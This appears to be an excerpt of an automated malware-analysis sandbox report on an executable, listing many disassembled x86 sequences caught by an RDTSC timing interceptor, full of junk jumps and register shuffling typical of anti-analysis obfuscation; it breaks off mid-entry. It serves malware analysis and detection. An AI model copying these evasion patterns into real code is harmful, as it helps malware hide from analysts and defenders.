Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54000F2 second address: 5400102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400102 second address: 540012B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17B0FBC275h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540012B second address: 5400148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push eax 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 push esi 0x00000011 mov ebx, 1470582Eh 0x00000016 pop edx 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400148 second address: 5400172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, 4Bh 0x00000006 popad 0x00000007 jmp 00007F17B0FBC279h 0x0000000c popad 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400172 second address: 5400176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400176 second address: 540017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540017C second address: 54001F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 7A17E897h 0x00000008 pushfd 0x00000009 jmp 00007F17B0CB142Ch 0x0000000e add al, 00000008h 0x00000011 jmp 00007F17B0CB142Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F17B0CB1436h 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F17B0CB142Dh 0x00000028 jmp 00007F17B0CB142Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 jmp 00007F17B0CB1436h 0x00000035 mov esi, dword ptr [ebp+08h] 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54001F5 second address: 540024D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edi 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007F17B0FBC276h 0x0000000d or si, B258h 0x00000012 jmp 00007F17B0FBC26Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F17B0FBC276h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F17B0FBC26Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540024D second address: 5400253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400253 second address: 5400257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400257 second address: 5400276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0CB1434h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400276 second address: 54002F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F17B0FBC276h 0x00000010 je 00007F1822AEA5DEh 0x00000016 jmp 00007F17B0FBC270h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 mov al, 59h 0x00000025 mov edi, 57EA8DEEh 0x0000002a popad 0x0000002b je 00007F1822AEA5CEh 0x00000031 jmp 00007F17B0FBC275h 0x00000036 mov edx, dword ptr [esi+44h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F17B0FBC26Dh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54002F0 second address: 5400328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 call 00007F17B0CB1439h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400328 second address: 5400388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0FBC26Ch 0x00000008 mov bx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edx, 61000000h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F17B0FBC26Ah 0x0000001b sbb cx, 4558h 0x00000020 jmp 00007F17B0FBC26Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F17B0FBC276h 0x0000002e add ah, FFFFFFB8h 0x00000031 jmp 00007F17B0FBC26Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400388 second address: 54003C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F18227DF709h 0x00000010 pushad 0x00000011 mov ax, BEADh 0x00000015 mov si, 98A9h 0x00000019 popad 0x0000001a test byte ptr [esi+48h], 00000001h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F17B0CB142Bh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F079B second address: 53F07BE instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17B0FBC276h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F07BE second address: 53F07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F07CD second address: 53F0840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F17B0FBC278h 0x00000015 sub cx, 1908h 0x0000001a jmp 00007F17B0FBC26Bh 0x0000001f popfd 0x00000020 movzx eax, bx 0x00000023 popad 0x00000024 push ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007F17B0FBC279h 0x00000030 or cl, FFFFFFD6h 0x00000033 jmp 00007F17B0FBC271h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0840 second address: 53F0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0850 second address: 53F0854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0854 second address: 53F086B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17B0CB142Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F086B second address: 53F08C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F17B0FBC276h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F17B0FBC271h 0x00000016 push esi 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 jmp 00007F17B0FBC26Dh 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F17B0FBC26Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F08C5 second address: 53F0905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F17B0CB1437h 0x00000017 jmp 00007F17B0CB1433h 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0905 second address: 53F090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F090B second address: 53F090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F090F second address: 53F0942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC277h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17B0FBC272h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0942 second address: 53F097D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F17B0CB1436h 0x00000010 je 00007F18227E6E4Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F17B0CB142Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F097D second address: 53F0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0981 second address: 53F0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0987 second address: 53F09A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09A6 second address: 53F09AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09AA second address: 53F09B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09B0 second address: 53F09F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 342A93B1h 0x00000008 mov si, B9EDh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, esi 0x00000011 jmp 00007F17B0CB1438h 0x00000016 je 00007F18227E6DF0h 0x0000001c pushad 0x0000001d mov si, B2CDh 0x00000021 pushad 0x00000022 mov ch, B0h 0x00000024 mov si, dx 0x00000027 popad 0x00000028 popad 0x00000029 test byte ptr [76FB6968h], 00000002h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09F8 second address: 53F09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, cl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F09FF second address: 53F0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1437h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0A1A second address: 53F0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F1822AF1BE3h 0x00000011 pushad 0x00000012 mov bl, al 0x00000014 mov bx, 70ECh 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d mov ebx, 55AEF184h 0x00000022 pushfd 0x00000023 jmp 00007F17B0FBC26Dh 0x00000028 add esi, 23AA40C6h 0x0000002e jmp 00007F17B0FBC271h 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F17B0FBC26Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0A87 second address: 53F0B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0CB1437h 0x00000009 xor ax, 2CAEh 0x0000000e jmp 00007F17B0CB1439h 0x00000013 popfd 0x00000014 mov si, AD37h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F17B0CB1439h 0x00000023 push esi 0x00000024 pop edx 0x00000025 popad 0x00000026 mov cl, C9h 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F17B0CB142Fh 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F17B0CB1436h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov dx, AD94h 0x0000003b push edi 0x0000003c mov esi, 4D94C2DFh 0x00000041 pop eax 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 pushad 0x00000045 jmp 00007F17B0CB1431h 0x0000004a mov edx, esi 0x0000004c popad 0x0000004d push dword ptr [ebp+14h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007F17B0CB142Fh 0x00000058 mov edx, esi 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0B4D second address: 53F0B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC270h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0B61 second address: 53F0B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400983 second address: 540099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5480754 second address: 5480781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0CB142Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54708B9 second address: 54708C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54707CD second address: 54707DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410037 second address: 541003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541003B second address: 541003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541003F second address: 5410045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410045 second address: 541005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1432h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541005B second address: 541005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470AC0 second address: 5470B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 84h 0x00000005 pushfd 0x00000006 jmp 00007F17B0CB1438h 0x0000000b sbb cx, B148h 0x00000010 jmp 00007F17B0CB142Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov ecx, 3A1669DBh 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F17B0CB1433h 0x0000002b add esi, 086D0C3Eh 0x00000031 jmp 00007F17B0CB1439h 0x00000036 popfd 0x00000037 mov ebx, ecx 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470B3C second address: 5470B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470B4B second address: 5470BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f pushfd 0x00000010 jmp 00007F17B0CB1439h 0x00000015 jmp 00007F17B0CB142Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F17B0CB1435h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470BAF second address: 5470BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470BB5 second address: 5470BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17B0CB1435h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470BE8 second address: 5470C1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 8C95B491h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 call 00007F17B0FBC275h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470C6B second address: 5470C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5470C7A second address: 5470CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F17B0FBC279h 0x00000012 xor cx, 2D86h 0x00000017 jmp 00007F17B0FBC271h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F17B0FBC270h 0x00000023 add cx, 3028h 0x00000028 jmp 00007F17B0FBC26Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420309 second address: 5420326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420326 second address: 5420385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0FBC26Ch 0x00000011 sbb esi, 49C786A8h 0x00000017 jmp 00007F17B0FBC26Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov si, BEB5h 0x00000022 mov si, 9131h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F17B0FBC279h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420385 second address: 5420389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420389 second address: 542038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542038F second address: 54203C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F17B0CB1430h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F17B0CB142Eh 0x00000017 mov si, DE61h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54203C9 second address: 54203E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 call 00007F17B0FBC26Ch 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54203E7 second address: 542041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 907Dh 0x00000007 jmp 00007F17B0CB142Ah 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f call 00007F17B0CB1429h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F17B0CB1437h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542041D second address: 542044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3521022Ah 0x00000008 jmp 00007F17B0FBC26Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F17B0FBC274h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542044A second address: 54204D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F17B0CB1439h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F17B0CB1437h 0x0000001b adc ecx, 1EC0223Eh 0x00000021 jmp 00007F17B0CB1439h 0x00000026 popfd 0x00000027 mov eax, 7B114987h 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F17B0CB1438h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54204D5 second address: 54205BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F17B0FBC276h 0x0000000f call 00007F17B0FBC269h 0x00000014 pushad 0x00000015 mov dx, E0E0h 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F17B0FBC276h 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jmp 00007F17B0FBC26Bh 0x00000029 mov eax, dword ptr [eax] 0x0000002b jmp 00007F17B0FBC279h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jmp 00007F17B0FBC271h 0x00000039 pop eax 0x0000003a jmp 00007F17B0FBC26Eh 0x0000003f mov eax, dword ptr fs:[00000000h] 0x00000045 pushad 0x00000046 push ecx 0x00000047 pushfd 0x00000048 jmp 00007F17B0FBC26Dh 0x0000004d add ax, 9356h 0x00000052 jmp 00007F17B0FBC271h 0x00000057 popfd 0x00000058 pop eax 0x00000059 push ebx 0x0000005a pushad 0x0000005b popad 0x0000005c pop eax 0x0000005d popad 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 